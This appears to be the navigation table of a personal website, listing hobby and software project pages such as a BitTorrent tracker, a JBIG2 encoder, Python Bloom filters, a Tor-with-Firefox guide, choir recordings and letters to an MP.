| Jack and the Beanstalk | Jack and the Beanstalk |
| RIP Scan | Results of a Stage Scan Fire |
| Yosemite | Yosemite National Park |
| Projects | Incomplete things from the lab |
| Seagull's Bane | Linux Automounter |
| bttrackd | BitTorrent Tracker |
| CAPTCHA | CAPTCHA CGI script |
| Conserv | Console Serving |
| Deerpark | Using Tor with Firefox/1.1 (Deerpark) |
| DNSFix | Fixing DNS |
| Xovers | XTA Crossover Control |
| IAFS | Archive Org Storage |
| JBIG2 | JBIG2 Encoder |
| Verify | PGP Key Verifier |
| MaxFlow | Maximal Flow in Python |
| PyBloom | Bloom Filters in Python |
| pyGnuTLS | Python wrapping of GnuTLS |
| Sxmap | Apache SuEXEC Map |
| Hellard | Union Server Notes |
| Recordings | Free recordings |
| ICSM Choir | St Paul's Church |
| School | Ancient School Stuff |
| Writings | Who knows |
| Cap Systems | Capability Systems |
| Intro | Introduction to me |
| Suprema | JMC2 Group Project |
| MP Letters | Letters I've written to my MP |
| Sound | Sound With Dramsoc |
| SyncThreading | The wonders of user-land threads |